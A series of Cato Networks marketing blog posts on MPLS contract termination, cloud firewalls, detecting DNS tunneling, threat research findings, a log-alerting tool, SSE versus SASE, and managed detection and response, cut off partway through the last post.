weeks, based on the threat's priority. Cato Provides Other Advantages Too Cato's solution shifts the heavy security processing burden from an appliance to the cloud, all while eliminating performance issues and false positives. It’s worth mentioning again that all of the work to investigate vulnerabilities, create custom signatures to mitigate them, and deploy them across the entire network is all on Cato. Customers do not need to do a thing other than keep up with our latest security updates on the Release Notes to realize the benefits of an up-to-date and highly accurate IPS. To learn more about the features and benefits of Cato’s IPS service, read Cato Adds IPS as a Service with Context-Aware Protection to Cato SD-WAN.    

How to Terminate Your MPLS Contract Early

In the era of digital transformation, your organization might be looking for a more agile and cloud-friendly alternative to MPLS. But while getting off your MPLS contract might seem daunting due to hefty early termination fees, it’s actually easier and less expensive than you might think. Let’s look at the four steps required for terminating...
How to Terminate Your MPLS Contract Early In the era of digital transformation, your organization might be looking for a more agile and cloud-friendly alternative to MPLS. But while getting off your MPLS contract might seem daunting due to hefty early termination fees, it’s actually easier and less expensive than you might think. Let’s look at the four steps required for terminating your MPLS contract, so you can find more flexible solutions (like SASE).  This blog post is based on the e-book “How to Terminate Your MPLS Contract Early”, which you can view here. 4 Steps for Your Get-Off-MPLS Strategy Here are the four steps we recommend to help you make a smooth transition from MPLS to the solution of your choice, like SASE: Understand the scope and terms of your MPLS contract Identify the MPLS circuits that can (and should) be replaced Involve your internal finance partners Use these negotiating tactics with your MPLS provider Now let’s dive into each one of them. 1. Understand the Scope and Terms of your MPLS Contract MPLS contracts are long legal documents, but it’s important to understand which terms and conditions you’re obliged to. Here are some important things to look out for: Does your termination date refer to the entire agreement, or to single MPLS circuits? In most contracts, the latter is the case. This means that your organization might have a number of separate terms for various circuits with different start and end dates. In such cases, it’s recommended to identify circuits that are about to expire the soonest to start the migration with them. Is there a Minimum Annual Revenue Commitment (MARC)? Many MPLS contracts require a minimal monthly or annual spend. If you retire one of your circuits, and your spending diminishes to below that minimum. you might be subject to a financial penalty. What is your liability for terminating an MPLS circuit before the termination date? Do you have to pay the entire sum of the fees, or maybe some of them? Discontinuing might still be worth it, despite the fees. What’s your notice of termination period? Check how early you have to notify the carrier about discontinuing services. Are you subject to automatic renewal? Are you locked into the contract unless you notify the carrier otherwise? By understanding what your contract requires, you can now proceed to the next steps of determining your termination and transition plan. [boxlink link="https://www.catonetworks.com/resources/terminate-your-mpls-contract-early-heres-how/?utm_source=blog&utm_medium=top_cta&utm_campaign=terminate_mpls"] Terminate Your MPLS Contract Early | Here's How [/boxlink] 2. Identify the MPLS Circuits that Can (and Should) Be Replaced To get a better picture of your available termination options, we recommend preparing a spreadsheet that will help you determine which circuits to target first: Create a row for each circuit Detail the liabilities and termination dates for each one. Order the circuits according to termination dates to see which ones can be migrated the soonest. Identify circuits that can be terminated without violating MARC and incurring penalties Check the monthly rate for circuits, in case you want to overlap through the migration     Termination Date Liabilities Termination Penalty MARC Violation (Y/N) Monthly Rate (Y/N) Circuit A Circuit B Circuit C   Now that you have your circuit status laid out, identify additional factors that will influence your migration options and negotiation: How much are you spending with your carrier overall? Even if you have early MPLS termination fees, you may be able to negotiate and leverage additional services to help waive them. What’s the ROI of your services after switching to SASE? The numbers will help you decide which penalties are worth paying. Now that you’ve identified different action plans, it’s time to get the finance department involved. Migrating from MPLS to SASE with Cato Networks Cato is the world’s first SASE platform, converging SD-WAN and network security into a global cloud-native service. Cato optimizes and secures application access for all users and locations. Using Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure branch Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever’s next. Learn more.    

The Future of the Enterprise Firewall is in The Cloud

If you’re like many of the IT leaders we encounter, you’re likely facing a refresh on your firewall appliances or will face one soon enough. And while the standard practice was to exchange one firewall appliance for another, increasingly, enterprises seem to be replacing firewall appliances with firewall-as-a-service (FWaaS). Yes, that’s probably not news coming...
The Future of the Enterprise Firewall is in The Cloud If you're like many of the IT leaders we encounter, you're likely facing a refresh on your firewall appliances or will face one soon enough. And while the standard practice was to exchange one firewall appliance for another, increasingly, enterprises seem to be replacing firewall appliances with firewall-as-a-service (FWaaS). Yes, that's probably not news coming from Cato. After all, we've seen more than 1,000 enterprises adopt Cato's FWaaS to secure more than 300,000 mobile users and 15,000 branch offices. And in every one of those deployments, FWaaS displaced firewall appliances. But it's not just Cato who's seeing this change. Last year, Gartner® projected that by 2025, 30% of new distributed branch office firewall deployments would switch to FWaaS, up from less than 5% in 2020.1 And just this week, for the first time, Gartner included Cato in its "Magic QuadrantTM for Network Firewalls” for the FWaaS implementation of a cloud-native SASE architecture, the Cato SASE Cloud.2" What's Changing for FWaaS What's behind this change? FWaaS, and Cato's FWaaS in particular, eliminates the cost and complexity of buying, evaluating, and upgrading firewall appliances. It also makes keeping security infrastructure up-to-date much easier. Rather than stopping everything and racing to apply new IPS signatures and software patches whenever a zero-day threat is found, Cato's FWaaS is kept updated automatically by Cato’s engineers. Most of all, FWaaS is a better fit for the macro trends shaping your enterprise. No matter where users work or resources reside, FWaaS can deliver secure access, easily. By contrast, physical appliances are poorly suited for securing cloud resources, and virtual appliances consume significant cloud resources while requiring the same upkeep as their physical equivalents. And with users working from home, investing in appliances makes little sense. Delivering secure remote access with an office firewall requires backhauling the user’s traffic, increasing latency, and degrading the remote user experience. [boxlink link="https://www.catonetworks.com/resources/migrating-your-datacenter-firewall-to-the-cloud/?utm_source=blog&utm_medium=top_cta&utm_campaign=datacenter_firewall"] Migrating your Datacenter Firewall to the Cloud | Download eBook [/boxlink] Not Just FWaaS, Cloud-Native FWaaS But to realize those benefits, it's not enough that a provider delivers FWaaS. The FWaaS must run on a global cloud-native architecture. FWaaS offerings running on physical or virtual appliances hosted in the cloud mean resource utilization is still locked into the granularity of appliances, increasing their costs to the providers — and ultimately to their customers. Appliances also force IT leaders to think through and pay for high-availability (HA) and failover scenarios. It's not just about running redundant appliances in the cloud. What happens if the PoPs hosting those appliances fails? How do connecting locations and users failover to alternative PoPs? Does the FWaaS even have sufficient PoP density to support that failover? By contrast, with a cloud-native FWaaS, the Cato SASE Cloud shares virtual infrastructure in a way that abstracts resource utilization from the underlying technology. The platform is stateless and fully distributed, assigning tunnels to optimum Cato's Single Pass Cloud Engine (SPACE). The Cato SPACE is the core element of the Cato SASE architecture and was built from the ground up to power a global, scalable, and resilient SASE cloud service. Thousands of Cato SPACEs enable the Cato SASE Cloud to deliver the complete set of networking and security capabilities to any user or application, anywhere in the world, at cloud scale, and as a service that is self-healing and self-maintaining. What are the five attributes of a "cloud-native" platform? Check out this blog post, "The Cloud-Native Network: What It Means and Why It Matters," for a detailed explanation. Key to delivering a self-healing and self-maintaining architecture without compromising performance is the geographic footprint of the FWaaS network. Without sufficient PoPs, latency grows as user traffic must first be delivered to a distant PoP and then be carried across the unpredictable Internet. By, contrast the Cato Global Private Backbone underlying Cato's FWaaS is engineered for zero packet loss, minimal latency, and maximum throughput by including WAN optimization. The backbone interconnects Cato's more than 65 PoPs worldwide. With so many PoPs, users always have a low-latency path to Cato, even if one PoP should fail. How much better is the Cato global private backbone? An independent consultant recently tested iPerf performance across Cato, MPLS, and the Internet. Across Cato, iPerf improved by more than 1,300%. Check out the results for yourself here: https://www.sd-wan-experts.com/blog/cato-networks-hits-2-5b-and-breaks-speed-barrier/ Cato SASE Cloud: FWaaS on Steroids and a Whole Lot More Of course, as a SASE platform, FWaaS is only one of the many services delivered by the Cato SASE Cloud. In addition to a global private backbone that can replace any global MPLS service at a fraction of the cost, Cato's networking capabilities includes edge SD-WAN, optimized secure remote access, and accelerated cloud datacenter integration. FWaaS is only one of Cato's many security services. Other security services include a secure web gateway with URL filtering (SWG), standard and next-generation anti-malware (NGAM), managed IPS-as-a-Service (IPS), and comprehensive Managed Threat Detection and Response (MDR) service to detect compromised endpoints. And, all services are seamlessly and continuously updated by Cato's dedicated networking and security experts to ensure maximum availability, optimal network performance, and the highest level of protection against emerging threats. FWaaS: A Better Way to Protect the Enterprise In our opinion, Gartner expert’s inclusion of Cato SASE Cloud in the Magic Quadrant is recognition of the unique benefits cloud-native FWaaS brings to the enterprise. FWaaS build on appliances simply cannot meet enterprise requirements, not for performance nor uptime. Cato’s cloud-native approach not only made FWaaS possible, but we proved that it can meet the needs of the vast majority of sites and users. Over time, cloud-native FWaaS will become the dominant deployment model for enterprise security. And Cato isn’t stopping there. Every quarter we expand our backbone, adding more PoPs. All of those PoPs run our complete SASE stack; they don’t just serve as network ingress points where traffic must be sent to yet another PoP for processing. We will also be adding new security services next year not by putting a marketing wrapper around acquired or third-party solutions, but by building them ourselves, directly into the rest of the Cato Cloud. As for EPP and EDR, neither are currently in scope for SASE but both are viable targets for convergence. Comparing cloud services and boxes is always challenging. Ultimately, enterprises face a trade-off between DIY or consuming the technology as a service. Moving to the cloud alters the cost of ownership, bringing the same agility and power that’s changed how we consume applications, servers, and storage to security. To better understand how Cato can improve your enterprise, contact us to run a quick proof-of-concept. You won't be disappointed.   1 Gartner, Critical Capabilities for Network Firewalls, Magic Quadrant for Network Firewalls, Rajpreet Kaur, Adam Hils, Jeremy D'Hoinne, 10 November 2020   2 Gartner, Magic Quadrant for Network Firewalls, Rajpreet Kaur, Jeremy D'Hoinne, Nat Smith, and Adam Hils, 1 November 2021   GARTNER and MAGIC QUADRANT are registered trademarks and service marks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s Research & Advisory organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.    

How to Detect DNS Tunneling in the Network?

In the past several years, we have seen multiple malware samples using DNS tunneling to exfiltrate data. In June, Microsoft Security Intelligence warned about BazarCall (or BazaLoader), a scam infecting victims with malware to get them to call a phony call center. BazarCall can lead to Anchor malware that uses DNS tunneling to communicate with...
How to Detect DNS Tunneling in the Network? In the past several years, we have seen multiple malware samples using DNS tunneling to exfiltrate data. In June, Microsoft Security Intelligence warned about BazarCall (or BazaLoader), a scam infecting victims with malware to get them to call a phony call center. BazarCall can lead to Anchor malware that uses DNS tunneling to communicate with C2 servers. APT groups also used DNS tunneling in a malware campaign to target government organizations in the Middle East. We will present a few techniques you can use to detect DNS tunneling in your network. DNS Tunneling in a Nutshell So how do attackers use DNS tunneling in their malware? It’s simple: First, they register a domain that is used as a C&C server. Next, the malware sends DNS queries to the DNS resolver. Then the DNS server routes the query to the C2 server. Finally, the connection between the C2 server and the infected host is established. For attackers, DNS tunneling provides a convenient way to exfiltrate data and to gain access to a network because DNS communications are often unblocked. At the same time, DNS tunneling has very distinct network markers that you can use to detect DNS tunneling on your network. [boxlink link="https://www.catonetworks.com/resources/eliminate-threat-intelligence-false-positives-with-sase?utm_source=blog&utm_medium=top_cta&utm_campaign=eliminate_threat_ebook"] Eliminate Threat Intelligence False Positives with SASE | Download eBook [/boxlink] DNS Tunnel to an Any Device In terms of network markers, TXT type queries are very common in DNS tunneling. However, DNS tunneling can also be used in uncommon query types, such as type 10 (NULL). To detect DNS tunneling in your network you need to examine long DNS queries and uncommon DNS query types, distinguish between legitimate security solutions as AVs and malicious traffic, and distinguish between human-generated DNS traffic and Bot-generated traffic. In the following example, we will analyze the algorithm behind the DNS tunneling traffic that we have seen in our customer networks. We have seen many cases of DNS tunneling used on Windows, however in the following example it was used on Android. Examine the Algorithm Generating the DNS We have seen a few common characteristics where DNS queries were used on Android DNS tunneling use-cases.  In the screenshot (figure 1) we can see the same algorithm used in multiple DNS queries. We have broken the algorithm into eight parts:  [caption id="attachment_19801" align="alignnone" width="1842"] Figure 1 - DNS tunneling example[/caption] In figure 1, we can see the same algorithm used in multiple DNS queries. We have broken the algorithm into 5 parts: There are 4-11 characters in the first part - Red The first 6 characters in the second part are repeated between different queries - Blue There are 63 characters in the next parts - Yellow The last section has 10 characters - Black The first letter in the second part is repeated with a unified string - Green By examining the algorithm, we can understand that these DNS queries originate from the same Bot, since they have the same algorithm. We can also assume it is Bot traffic, since it's a unified algorithm that is repeated in different DNS queries. Bot-generated traffic tends to be consistent and uniform. Examine the Destination Next, we examine the destination of the DNS queries. By examining the destination, we identify several unknown servers. When we examined what other DNS queries those servers received, we couldn’t find any except the tunneling queries.  If you can’t find any legitimate traffic to the DNS server, it’s another indicator that this is server may be used by malware. Examine the Popularity Given a sufficiently large networks, developing an algorithm for measuring the popularity of IP/Domain among your users will also help hunt malware. By using such a Popularity algorithm across the hundreds of thousands of users on the Cato network, we can see that the popularity of the servers in the DNS queries to be low. Low popularity of an IP is often an indicator of a malicious server as the server may only used by the malware. Low popularity alone, however, is insufficient to determine a malicious site. It must be joined with other indicators, such as the ones outlined above. Conclusion DNS tunneling is an old technique that allows attackers to communicate with C2 servers and exfiltrate data through many firewalls. Focusing on the network characteristics, though, allows the threat to be identified. In our case, we found multiple DNS queries generated by an algorithm, a destination with unknown servers, and servers that were unpopular. Any one indicator alone may not reflect malicious communications but together there’s a very high probability that this session is malicious — a fact that we validated through manual investigation. It was an excellent example of how combining networking and security information can lead to better threat detection.    

Security Threat Research Highlights #1

In Q1 2021, 190 billion traffic flows passed through Cato’s SASE Network. Leveraging deep network visibility and proprietary machine learning algorithms, our MDR team set out to analyze and identify new cyber threats and critical security trends, and have recently published their findings in the SASE Threat Research Report. Below, we provide you with 5...
Security Threat Research Highlights #1 In Q1 2021, 190 billion traffic flows passed through Cato’s SASE Network. Leveraging deep network visibility and proprietary machine learning algorithms, our MDR team set out to analyze and identify new cyber threats and critical security trends, and have recently published their findings in the SASE Threat Research Report. Below, we provide you with 5 key insights from this report. Key Highlights from Cato Networks’ SASE Threat Research Report #1. Top 5 Threat Types in 2021 By using machine learning to identify high-risk threats and verified security incidents, Cato is able to identify the most common types of attacks in Q1 2021. The top five observed threat types include: Network Scanning: The attacker is detected testing different ports to see which services are running and potentially exploitable. Reputation: Inbound or outbound communications are detected that point to known-bad domains or IP addresses. Vulnerability Scan: A vulnerability scanner (like Nessus, OpenVAS, etc.) is detected running against a company’s systems. Malware: Malware is detected within network traffic. Web Application Attack: Attempted exploitation of a web application vulnerability, such as cross-site scripting (XSS) or SQL injection, is detected. The top three threat types demonstrate that cybercriminals are committed to performing reconnaissance of enterprise systems (using both port and vulnerability scans) and are successfully gaining initial access (as demonstrated by the large number of inbound and outbound suspicious traffic flows). [boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware"] Ransomware is on the Rise | Download eBook [/boxlink] #2. Regional Bans Create False Sense of Security In the news, most cybercrime and other online malicious activity are attributed to a small set of countries. As a result, it seems logical that creating firewall rules blocking traffic to and from these countries would dramatically improve a company’s security posture. However, these regional bans actually create a false sense of security. The vast majority of malicious activity originates in the US, accounting for more than these four largest sources (Venezuela, China, Germany, and Japan) put together. Regional bans have little or no impact because most malware sources and command & control servers are in the US. #3. Cybercriminals Exploit Remote Administration Tools Remote access and administration tools like, and TeamViewer became significantly more popular during the pandemic. These tools enabled businesses to continue functioning despite a sudden and forced transition to remote work. However, these tools are popular with cybercriminals as well. Attackers will try to brute-force credentials for these services and use them to gain direct access to a company’s environment and resources. RDP is now a common delivery vector for ransomware, and a poorly-secured TeamViewer made the Oldsmar water treatment hack possible. #4. Legacy Software and PHP are Commons Targets An analysis of the Common Vulnerabilities and Exposures (CVEs) most targeted by cybercriminals reveals some interesting trends. The first is that PHP-related vulnerabilities are extremely popular, making up three of the top five vulnerabilities and potentially allowing an attacker to gain remote code execution (RCE). Another important takeaway is that cybercriminals are targeting age-old threats lurking on enterprise networks. Cybercriminals are commonly scanning for end-of-life, unsupported systems and vulnerabilities that are over 20 years old. #5. Enterprise Traffic Flows Aren’t What You Expect The analysis of business network traffic flows shows that Microsoft Office and Google applications are the two most commonly used cloud apps in enterprise networks. However, that is not to say that they are the most common network flows on enterprise networks. In fact, the average enterprise has more traffic to TikTok than Gmail, LinkedIn, or Spotify. These TikTok flows threaten enterprise security. Consumer applications can be used to deliver malware or phishing content, and the use of unsanctioned apps creates new vulnerabilities and potential attack vectors within a company’s network. Improve Your Network Visibility and Security with Cato Cato’s quarterly SASE Threat Research Report demonstrated the importance of deep network visibility and understanding for enterprise security. While some of the trends (such as the exploitation of remote access solutions) may have been predictable, others were less so. To learn more about the evolving threat landscape, read the full report, and stay tuned for the next one. Cato was able to generate this report based on the deep visibility provided by its SASE network. Achieving this level of visibility is essential for enterprises looking to identify the top trends and security threats within their networks.    

Why Cato has Just Hit $2.5B in Valuation

If you are following the SASE, SD-WAN, and cloud-based security markets, you know that they are mostly comprised of very large vendors. Most standalone players in categories such as SD-WAN and CASB had been acquired by these large vendors, in part to enable them to compete in the SASE space by completing their offerings to...
Why Cato has Just Hit $2.5B in Valuation If you are following the SASE, SD-WAN, and cloud-based security markets, you know that they are mostly comprised of very large vendors. Most standalone players in categories such as SD-WAN and CASB had been acquired by these large vendors, in part to enable them to compete in the SASE space by completing their offerings to include both SD-WAN and security. The acquisition prices were a fraction of Cato’s valuation today. What makes Cato different? Since its inception, Cato was built to boldly compete against a wide range of large software and hardware vendors, as well as Telcos, with our fundamentally differentiated architecture and value proposition. What is in play is the transition from appliances and point solutions built for on-premises deployments to a pure cloud-native platform. This is the Amazon Web Services (AWS) moment of networking and security. However, all our competitors in the SASE space are using legacy building blocks duct-taped together with cloud-native point solutions. They hope to evolve their solutions to become more seamless and more streamlined over time. Our position is that building “AWS-like” networking and security cloud service requires a brand-new platform and architecture. This is exactly what Cato did in 2015. Since then, we have grown our cloud service capabilities, global footprint, and customer base, massively. We had proven that it is possible to deliver networking and security as a service with the automation, efficiency, resiliency, and scalability that comes with true cloud-native design. The promise underpinning Cato’s vision is a better future for both the business and IT. The business can get things done quickly because IT can deliver on the underlying technology more efficiently. And it is possible, as is the case with services like AWS, because the platform takes care of all the heavy lifting associated with routing, optimization, redundancy, security and so much more. All is left for our customers is to plug in the new office, group of users, cloud application, or whatever resource happens to be next – into the Cato SASE Cloud. Secure and optimized access is now done. We have a lot more work to do in the market. We are on a mission to let businesses realize an even better future for networking and security and to forever change the way they run their infrastructure. Stay tuned.

Personalized alerts straight from production environments

Good descriptive logs are an essential part of every code that makes it to production. But once the deliverable leaves your laptop, how much do you really look at them? Sure, when catastrophe hits, they provide a lot of the required context of the problem, but if everything just works (or so you think) do...
Personalized alerts straight from production environments Good descriptive logs are an essential part of every code that makes it to production. But once the deliverable leaves your laptop, how much do you really look at them? Sure, when catastrophe hits, they provide a lot of the required context of the problem, but if everything just works (or so you think) do you look at them? Monitoring tools do (hopefully), but even they are configured to only look for specific signs of disaster, not your everyday anomalies. And when will these be added? Yup, soon after a failure, as we all know any root cause analysis doesn’t come complete with a list of additional monitoring tasks. One of our security researchers developed a solution. Here’s what he had to say: What I’ve implemented is a touch-free and personalized notification system that takes you and your fellow developers a couple of steps closer to the production runtime. Those warning and error logs? Delivered to you in near real time, or a (daily) digest shedding light on what really goes on in that ant farm you’ve just built. Moreover, by using simple code annotations log messages can be sent to a slack channel enabling group notifications and collaborations. Your production environment starts talking to ya. The system enables developers to gain visibility into the production runtime, resulting in quicker bug resolution times, fine tuning runtime behavior and better understanding of the service behavior. Oh, and I named it Dice - Dice Is Cato’s Envoy. It was a fun project to code and is a valuable tool we use. [boxlink link="https://www.catonetworks.com/resources/eliminate-threat-intelligence-false-positives-with-sase?utm_source=blog&utm_medium=top_cta&utm_campaign=Eliminate_Threat_Intelligence"] Eliminate Threat Intelligence False Positives with SASE [/boxlink] How does it work then? The first step is building a list of log messages extracted from the source code and a matching list of interested parties. These can be explicitly stated on a comment following the log line in the code, or automatically deduced by looking in the source control history for the last author of the line (i.e. git blame). Yes, I can hear you shouting that the last one on the blame list isn’t necessarily the right developer and you’d be right. However, in practice this isn’t a major problem, and can be addressed by explicit code annotations. Equipped with this list of messages and authors the system now scans the logs, looking for messages. We decided to focus on Warning and Error messages as they are usually used to signal anomalies or plain faults. However, when an explicit annotation is present in the code we process the message regardless of its log level. Code examples   Code line Alerting effect INFO_LOG("hello cruel world"); // #hello-worlders Channel to which messages should be sent WARN_LOG("the sky is crying"); // @elmore@mssp.delta Explicit mentioning of the developer (Elmore) ERROR_LOG("it hurts me too"); No annotation here, so blame information will be used (e.g. pig@pen.mssn)   Alerting Real time messages Channel messages (as in the example above) are delivered as soon as they are detected, which we used to communicate issues in real time to developers and support engineers. This proved to be very valuable as it enabled us to do a system inspection during runtime, while the investigated issue was still occurring, dramatically lowering the time to resolution. For example, we used channel messages to debug a particularly nasty IPsec configuration mismatch. The IPsec connection configuration is controlled by our client, and hence we could not debug issues in a sterile environment where we have full control over both ends of the configuration. With the immediate notifications, we were able to get the relevant information out of the running system. Digests Digests are also of great value, informing a developer of unexpected or even erroneous behavior. My code (and I guess yours also) has these “this can’t really happen” branches, where you just log the occurrence and get the hell out of the function. With Dice’s messages, I was able to know that these unimaginable acts of the Internet are actually more frequent than I imagined and should get special treatment rather than being disregarded as anomalies. Alerts are usually sent to users in the form of a daily digest, grouping all the same messages together with the number of occurrences, on which servers and the overall time frame. Slack usage Using Slack as the communication platform, enables the system to make some judgment regarding the notifications delivery - developers asked for digests to be sent only when they are online and, in any case, not during the weekend, which is easy to accommodate. Furthermore, the ability to add interactive components into the messages opens the door for future enhancements described below. Aftermath Useful as Dice is, it can be made even greater. Interactivity should be improved - many times notifications should be snoozed temporarily, till they are addressed in the code, or indefinitely as they are just redundant. The right (or some definition of right)  solution is usually to change the log level or remove the message entirely. However, the turnaround for this can be weeks, we deploy new versions every two weeks, so this is too cumbersome. A better way is to allow snoozing/disabling a particular message directly in Slack, via actions. "It wasn’t me" claim many Sing Sing inmates and blamed developers - the automatically generated blame database may point to the wrong author, and the system should allow for an easy, interactive way of directing a particular message to its actual author. It can be achieved via code annotations, but again this is too slow. Slack actions and a list of blame overrides is a better approach. Wrapping up Logs are essentially a read-only API of a system, yet they are mostly written in free form with no structural or longevity guarantees. At any point a developer can change the text and add or remove variable outputs from the messages. It is therefore hard to build robust systems that rely on message analysis. Dice, elegantly if I may say, avoids this induced complexity by shifting the attention to personalized and prompt delivery of messages directly to relevant parties, rather than feeding them into a database of some sort and relying on the monitoring team to notify developers of issues.    

SSE: It’s SASE without the “A”

As IT leaders look to address the needs of the digital enterprise, significant changes are being pushed onto legacy networking and security teams. When those teams are in lockstep and ready to change, SASE adoption is the logical evolution. But what happens when security teams want to modernize their tools and services but networking teams...
SSE: It’s SASE without the “A” As IT leaders look to address the needs of the digital enterprise, significant changes are being pushed onto legacy networking and security teams. When those teams are in lockstep and ready to change, SASE adoption is the logical evolution. But what happens when security teams want to modernize their tools and services but networking teams remain committed to legacy SD-WAN or carrier technologies? For security teams, Gartner has defined a new category, the Security Service Edge (SSE). What is SSE? The SSE category was first introduced by Gartner in the “2021 Roadmap for SASE Convergence” report in March of 2021 (where it was named “Security Services Edge” with service in the plural) and later developed in several Hype Cycle reports issued in the summer. SSE is the half of secure access service edge (SASE) focusing on the convergence of security services; networking convergence forms the other half of SASE. The Components of SSE Like SASE, SSE offerings converge cloud-centric security capabilities to facilitate secure access to the web, cloud services, and private applications. SSE capabilities include access control, threat protection, data security, and security monitoring. To put that another way, SSE blends - Zero Trust Network Access (ZTNA) - Secure web gateway (SWG) - Cloud access security broker (CASB) - Firewall-as-a-service (FWaaS) and more into a single-vendor, cloud-centric, converged service. [boxlink link="https://www.catonetworks.com/resources/sase-vs-sd-wan-whats-beyond-security?utm_source=blog&utm_medium=top_cta&utm_campaign=sase_vs_sdwan"] SASE vs SD-WAN What’s Beyond Security | Download eBook [/boxlink] Why Is SSE Important? The argument of SSE is much of the same as for SASE. Legacy network security architectures were designed with the datacenter as the focal point for access needs. The cloud and shift to work-from-anywhere have inverted access requirements, putting more users, devices, and resources outside the enterprise network. Connecting and protecting those remote users and cloud resources require a wide range of security and networking capabilities. SSE offerings consolidate the security capabilities, allowing enterprises to enforce security policy with one cloud service. Like SASE, SSE will enable enterprises to reduce complexity, costs, and the number of vendors. SSE Need To Be Cloud Services Not Just Hosted Appliances The SSE vision brings core enterprise security technologies into a single cloud service; today’s reality will likely be very different. As we’ve seen with SASE, SSE is still in its early days, with few, if any, delivering a single, global cloud service seamlessly converging together ZTNA, SWG, RBI, CASB, and FWaaS. And as with SASE it’s important to determine which SSE vendors are cloud-native and which are simply hosting virtual machines in the cloud. Running virtual appliances in the cloud is far different from an “as-a-service.” With cloud-hosted virtual appliances, enterprises need to think through and pay for redundancy and failover scenarios. That’s not the case with a cloud service. Costs also grow with hosted appliances in part because companies must pay for the underlying cloud resource. With a cloud service, no such costs get passed onto the user. How Are SSE and SASE Similar? Beyond an “A” in their names, what separates SSE from SASE? As we noted, SSE technologies form the security component of SASE, which means the security arguments for SSE are much the same as for SASE. With users and enterprise resources existing, well, everywhere, legacy datacenter-centric security architectures are inadequate. At the same time, the many security tools needed to protect the enterprise add complexity, cost, and complicate root-cause analysis. SSE and SASE address these issues. Both are expected to converge security technologies into a single cloud service, simplifying security and reducing cost and complexity. With the primary enterprise security technologies together, security policies around resources access, data inspection, and malware inspection can be consistent for all types of access and users and at better performance than doing this separately. Both SSE and SASE should also allow enterprises to add flexible, cloud-based network security to protect users out of the office. And both are identity-driven, relying on a zero-trust model to restrict user access to permitted resources. The most significant difference between SSE and SASE comes down to the infrastructure. With Gartner SSE, enterprises unable or unwilling to evolve their networking infrastructure have a product category describing a converged cloud security service. By contrast, SASE brings the same security benefits while converging security with networking. SASE: Networking and SASE Better Together But bringing networking and security together is more than a nice-to-have. It’s critical for a platform to secure office, remote users, and cloud resources without comprising the user experience. Too often, FWaaS offerings have been hampered by poor performance. One reason for this is the limited number of PoPs running the FWaaS software, but the other issue was the underlying network. Their reliance on the global Internet, not a private backbone, to connect PoPs leaves site-to-site communications susceptible to the unpredictability and high latency of the global Internet. SSE solutions will face the same challenge If they’re to enforce site-to-site security. Converging networking and security together also brings other operational benefits. Deployment times become much shorter as there’s only one solution to set up. Root cause analysis becomes easier as IT teams can use a single, queryable timeline to interrogate and analyze all networking and security events. Cato is SASE Cato pioneered the convergence of networking and security into the cloud, delivering the Cato SASE Cloud two years before Gartner defined SASE. Today, over 1,000 enterprises rely on Cato to connect their 300,000 remote users and 15,000 branches and cloud instances. Cato SASE Cloud connects all enterprise network resources, including branch locations, the mobile workforce, and physical and cloud datacenters, into a global and secure, cloud-native network service. Cato SASE Cloud runs on a private global backbone of 65+ PoPs connected via multiple SLA-backed network providers. The backbone’s cloud-native software provides global routing optimization, self-healing capabilities, WAN optimization for maximum end-to-end throughput, and full encryption. With all WAN and Internet traffic consolidated in the cloud, Cato applies a suite of security services to protect all traffic at all times. Current security services include FWaaS, SWG, standard and next-generation anti-malware (NGAV), managed IPS-as-a-Service (IPS), and Managed Threat Detection and Response (MDR). Deploy Cato SASE for Security, Networking, or Both – Today Cato can be gradually deployed to replace or augment legacy network services and security point solutions: Transform Security Only: Companies can continue with their MPLS services, connecting the Cato Socket, Cato’s edge SD-WAN device, both to the MPLS network and the Internet. All Internet traffic is sent to the Cato Cloud for inspection and policy enforcement. Transform Networking Only: Companies replace their MPLS with the Cato SASE Cloud, a private global backbone of 65+ PoPs connected via multiple SLA-backed network providers. The PoPs software continuously monitors the providers for latency, packet loss, and jitter to determine, in real-time, the best route for every packet. Security enforcement can be done in the Cato SASE Cloud or existing edge firewall appliances. And, of course, when ready, enterprises can migrate networking and security to the Cato SASE Cloud, enjoying the full benefits of network transformation. To learn more about Cato can help your organization on its SASE journey, contact us here.

Understanding Managed Detection and Response: What is MDR?

Managed Detection and Response (MDR) is a security service designed to provide ongoing protection, detection, and response for cybersecurity threats. MDR solutions use machine learning to investigate, alert, and contain cyber threats at scale. Additionally, MDR solutions should include a proactive element, including the use of threat hunting to identify and remediate vulnerabilities or undetected...
Understanding Managed Detection and Response: What is MDR? Managed Detection and Response (MDR) is a security service designed to provide ongoing protection, detection, and response for cybersecurity threats. MDR solutions use machine learning to investigate, alert, and contain cyber threats at scale. Additionally, MDR solutions should include a proactive element, including the use of threat hunting to identify and remediate vulnerabilities or undetected threats within an enterprise’s IT environment. As the name suggests, MDR should be a fully managed solution, on top of being an automated one. While MDR relies heavily on advanced technology for threat detection and rapid incident response, human analysts should also be involved in the process to validate alerts and ensure that the proper responses are taken. According to Gartner, MDR services provide turnkey threat detection and response through remotely delivered, 24/7 security operations center capabilities. Gartner predicts that half of companies will partner with an MDR provider by 2025. [boxlink link="https://www.catonetworks.com/services?utm_source=blog&utm_medium=top_cta&utm_campaign=MDR_page#managed-threat-detection-and-response"] Read about our Managed Threat Detection and Response (MDR) [/boxlink] The Need for MDR MDR has evolved to meet the cybersecurity needs of the modern enterprise. The rapid expansion of the cyber threat landscape and widespread use of automation by threat actors means that everyone is at risk of cyberattacks. These threats are evolving quickly with new ones introduced every day. Detecting and responding to these advanced threats requires capabilities that many enterprises are lacking. On average, it takes six months for an enterprise to identify a data breach after it has occurred (the “dwell time”), a number that has doubled in the last two years. Additionally, the cost of a data breach continues to rise and is currently almost $4 million. MDR is important because it provides enterprises with the security capabilities that they lack in-house. With MDR, enterprises can rapidly achieve the level of security needed to prevent, detect, and respond to advanced threats, as well as sustain these capabilities as cyber threats continue to evolve. The Challenges MDR Confronts A six-month dwell time demonstrates that businesses are struggling to identify and respond to cybersecurity incidents, due to various factors, including: Lack of In-House Security Talent: The cybersecurity industry is experiencing a talent gap with an estimated 3.1 million unfilled roles worldwide, and 64% of enterprises struggle to find qualified security talent. With MDR, enterprises can leverage external talent and resources to fill security gaps. Complex Security Tools: Security solutions may require careful tuning to an enterprise’s environment, which 